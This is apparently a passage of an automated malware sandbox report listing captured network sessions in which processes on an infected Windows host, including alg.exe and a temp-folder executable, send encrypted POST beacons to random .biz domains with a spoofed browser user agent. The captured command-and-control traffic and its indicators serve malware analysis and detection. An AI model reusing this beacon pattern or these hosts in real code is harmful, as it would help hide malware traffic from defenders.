                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.998938084 CET836OUTData Raw: 11 c1 ea ef d2 04 c9 9c 38 03 00 00 4f 5d ab 27 c9 a0 f0 84 1a da 0b da 8e 63 8f 5e c4 6e 9c d6 18 8f 12 33 e7 9f 0c d9 8e f6 17 46 e5 f0 38 2a db 93 ff 39 31 8b df 98 34 af a2 f8 e9 5c 60 fc 07 7b 31 9b 72 7b 7f ec 21 5d 7b b4 8b ac b9 ff dc eb
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 8O]'c^n3F8*914\`{1r{!]{7Rri}Z*$1<(M>}iw3c>lKH8/im ^-?(qCf=3gK ]S1Nk&O/SZB nPfd'iGpv] ;xh


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        13192.168.2.1049868172.234.222.138807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:40.069932938 CET346OUTPOST /mdv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:40.069952965 CET778OUTData Raw: d2 6a 85 3d ea 92 ff 3a fe 02 00 00 b2 06 14 21 31 f7 6e 7d 97 f5 24 97 20 34 1d f8 4c c8 c2 c7 d7 88 22 a6 d9 59 87 65 ac 70 1e 19 98 ed b7 f1 15 c5 e0 8a 06 4e d6 5b 92 ab 78 eb 5d 6f ac 8f 07 f4 b7 ec cf d0 84 59 bf 40 b9 2f 43 9c b0 3f 48 b3
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: j=:!1n}$ 4L"YepN[x]oY@/C?H%+RG0:;]^m@:Hhayp:G.$h^3dTwAruKqq2b!t4AAg,[K--/2}a<[]x


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        14192.168.2.104987082.112.184.197807256C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:40.701502085 CET356OUTPOST /tcewuceccwlpap HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:40.701529980 CET836OUTData Raw: dd 95 f2 be 63 49 4b 94 38 03 00 00 ec 42 ce ad 08 43 2c 8f 8e 5e 7e 6c b6 d1 17 25 54 32 0c 6d c4 cf 9b f6 ce ce 15 2d 4d d9 6c cc a8 e4 41 e1 fc 1a ea 3c 9b a3 a8 38 10 90 83 d4 f5 dd 4f af db bf 03 e3 67 b8 7c 9b 4c 6d aa 77 c6 5c 70 f9 b0 d4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: cIK8BC,^~l%T2m-MlA<8Og|Lmw\p+OM1Jk%f$X+F^W}T ^?}V>wMbXjh hTse|"=94EMPSR*h;X5`QQWL&x


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        15192.168.2.104987618.141.10.107807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.888501883 CET355OUTPOST /kiuupxbhsmi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.888617992 CET778OUTData Raw: ee bf 96 e1 7d 60 03 e5 fe 02 00 00 34 cf d3 8a 61 53 de 6a 16 2f 86 2b 5c aa 56 8b 7a 8d 03 74 6d ac e5 e7 f0 33 e4 d8 cc 01 14 af b2 03 42 38 45 8a 4a da e9 94 cf b2 ad fb f0 d2 da 44 99 5a a3 6c 94 31 bd ab 95 7c 9f af 24 a4 99 d7 f7 26 a5 3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: }`4aSj/+\Vztm3B8EJDZl1|$&>Zr2,!uPc{=ZV2{zP|e:a1VQu*J-/=?OV)To!S^"M:/)u}dPpa..]SisK:)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.124933004 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=656e984b91d5ebd58b0c177c7246b7e4|155.94.241.187|1731920262|1731920262|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        16192.168.2.104989082.112.184.197807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.111305952 CET356OUTPOST /llpilismcsqqsd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.111342907 CET778OUTData Raw: b6 65 80 ec e2 00 99 26 fe 02 00 00 fc 21 58 d6 c9 ba af c6 47 ae f6 2b 47 61 8e 4d 5f fb bb 83 58 62 29 1e 4b 2b b9 5a 5d 5d 87 39 93 91 d4 5f 91 51 a4 4a 06 bb e9 14 13 79 65 7f 33 94 ff 8f 0a 47 a5 73 eb c9 3e a2 0d 3c e2 fa 20 58 78 12 8b 72
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: e&!XG+GaM_Xb)K+Z]]9_QJye3Gs>< Xxr[ErI/a^PaniTk):-LAqUpA5@D]O_X,2iK /msr{c(y70%$Wqa?W-{o5Xkjlj%H+4


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        17192.168.2.104989782.112.184.197807256C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:45.453375101 CET359OUTPOST /aldxsqumvddjjq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:45.453424931 CET836OUTData Raw: ab d1 1e 2a 9a 3b 77 97 38 03 00 00 13 bd 4d d2 b7 f8 57 5d 7e c9 dc 7b 90 51 18 40 a7 71 86 5b 4c bc 2c fb 43 e1 6c d6 d0 2d 27 a0 f4 fb 51 18 15 8e 5b 1a 12 8a 9f ed a9 70 fe db 01 5c 1e 48 2e 68 fb 01 f6 a4 02 ad 17 bd da 94 2b ca 61 88 a8 b9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: *;w8MW]~{Q@q[L,Cl-'Q[p\H.h+a7C+rjGtM]gJt$~<d#-k56$L=8@-FEhbkY;K(_n^Xg_'_*Ni,jVp/0U


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        18192.168.2.104992982.112.184.197807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:52.941453934 CET354OUTPOST /qwmkydqbbfrm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:52.941487074 CET778OUTData Raw: bb 3a 8c 97 1f 7a c6 3c fe 02 00 00 55 9a 87 c0 23 12 c9 60 af f9 1d 87 30 3e 63 8a a0 e9 72 ef 06 fb bc 04 c0 86 a8 6c bd 0d 26 9c 2d fb 17 1a 1d 3a 77 0e 13 2f 53 52 82 2a 88 9b b7 62 97 65 25 f9 80 dc ba d7 e4 76 68 6f 3f b3 2b af 22 52 b4 db
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :z<U#`0>crl&-:w/SR*be%vho?+"R^BOmL6#u<C.NBQuKQJQDCqVdkk3'HU:rd=ms4f\u;C\U7d(,SU9oz;c,+


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        19192.168.2.104997882.112.184.197807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.509984970 CET358OUTPOST /ebrtsarfcsylm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.509984970 CET778OUTData Raw: cc 6c e1 74 1b 78 17 03 fe 02 00 00 38 65 68 3f 0b 86 e1 b4 ce 8d cc b9 e5 45 37 83 fc f4 bc cc c4 a5 d6 e3 74 e6 bb 7a 3d e7 fd f3 0c c4 f8 5c d4 54 f2 b1 24 f8 3c 80 c5 50 fe f2 8b 88 7d a6 9f 89 c4 a5 54 c2 b6 95 80 6a 5f db 7d 7e e8 3d 23 c9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ltx8eh?E7tz=\T$<P}Tj_}~=#"t:3<COw{A5miUA|vk)AdL+3lW]I&<\]1}w8H^@Nw!Xsr,EdR3QU~[T`Q0.6!|=. ,YO8Yhl


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        20192.168.2.104999982.112.184.197807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.096322060 CET354OUTPOST /fymfqakvq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.096322060 CET778OUTData Raw: 38 02 30 75 ee 99 84 6f fe 02 00 00 19 b4 1d e6 0c 7c 85 ce 06 84 56 e3 52 24 ae 2c 88 e4 d8 3a 6f 2e 96 b1 db 05 e5 cc 7d 80 03 91 13 6a 70 db ca 90 19 a7 5a 0d 8c de a0 c0 53 b7 61 56 fd 55 64 0c 4c 56 29 22 91 81 0f 3e 1a d3 02 72 8f 99 e0 78
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 80uo|VR$,:o.}jpZSaVUdLV)">rx7DO.GPinOR));G>w}^h0_'bo661]CStih-Y~H9P?6\py7+NToS6Y[/2='EHqG?LB!xa)@


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        21192.168.2.105000047.129.31.212807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.592339993 CET356OUTPOST /dauxqowjtksae HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.592356920 CET778OUTData Raw: b0 bd ef 80 c7 b0 a5 e7 fe 02 00 00 ca 8b 7f 3d 4c da ff 69 56 c6 87 4e 7c 2d 92 57 f2 f7 24 00 34 5b e2 08 06 c9 a3 f7 f3 4c 78 c3 ea e5 04 c2 e5 ce 4a 99 47 1f ce 33 7b e3 9c 0d 57 0b 58 f9 86 a9 30 f8 ac ff f2 37 62 a3 c3 5e b7 a3 92 a2 c3 17
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: =LiVN|-W$4[LxJG3{WX07b^cAYS98}/{PC>y*WO9+r5w$e)R:Tj$$s~f'-zx%)$fYFjAY0Y2LW!]W+L%*r~y_<d)blSv
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.069251060 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5542e77911e5d206d30eeff9fdbeab8c|155.94.241.187|1731920294|1731920294|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        22192.168.2.105000154.244.188.17780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.952994108 CET354OUTPOST /codtypdrb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.952994108 CET834OUTData Raw: bc 9a cf f2 b6 90 81 61 36 03 00 00 e2 58 19 8b 6f 8b d6 31 3c bc 8d c5 9c 74 3f 9d f2 e9 7a 2d c4 db 38 fe 27 55 5d a5 a0 11 42 ed 7c 12 fe 05 46 b5 a7 e0 30 c6 c2 cb 47 a3 6d 57 b3 65 0a db fd f9 01 34 d1 87 48 cb 32 2a 72 ce 7c 94 1d af 3a ab
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: a6Xo1<t?z-8'U]B|F0GmWe4H2*r|:,!plT}jRy{y+2npe\\2bg.P$.2iYkB+i(aba0.",~Mr=#o<7z!~=Fs%^%z
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.787637949 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3ed6212fcf6e4ffba04f7a8c6c6fa5e7|155.94.241.187|1731920295|1731920295|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        23192.168.2.105000213.251.16.150807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.273842096 CET353OUTPOST /xurkvjsynkj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.273859024 CET778OUTData Raw: 38 0a d0 f9 81 90 5e 2f fe 02 00 00 f2 dd 55 9a e1 9b 7f 44 f8 d5 e8 03 dd 47 18 c1 f1 b0 83 ff 87 8b 36 34 5c 61 5a b2 22 8a 6e 10 7e bc cd 53 b5 70 fd 7d 46 cd 9e 1f 58 1e a1 e2 68 b8 26 86 82 08 11 14 d8 d3 a7 15 58 7f 6f dd a2 48 b6 fa 4e 31
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 8^/UDG64\aZ"n~Sp}FXh&XoHN1pP!q[I`y/}}#3zS=g$CS8GA~x>@Y4H:8d8h{hn8w'Ii_F+Ueyn9.zdr#Aa|&


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        24192.168.2.105000313.251.16.150807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.592030048 CET357OUTPOST /mjdirtnxyxmmbdd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.592030048 CET778OUTData Raw: 7e 11 23 02 d4 ff cc ec fe 02 00 00 51 a8 9b 13 b6 ce 96 f8 6f f2 52 ba c2 ab 73 2a ff 75 bd 45 e2 9c 55 c9 00 05 3d c9 ce e6 3c 59 a5 35 fb d8 4a 75 0b ce 84 43 c3 05 2a 28 a9 b6 28 2b 5c 8e 0b c1 f2 68 07 0e f1 b7 8f 3e 7c 8e 9e db e0 1c 8d 08
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ~#QoRs*uEU=<Y5JuC*((+\h>|=t?%FU"Drm}1/;`v8 (T6IuM86J?-P@d{7Kh@5>OjccqGq69<dyG#mvBiN}>Tu/S3A[d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.031522036 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e2b78041bd9aaa8d555633efcb9ff28d|155.94.241.187|1731920296|1731920296|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        25192.168.2.105000418.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.806526899 CET345OUTPOST /qd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
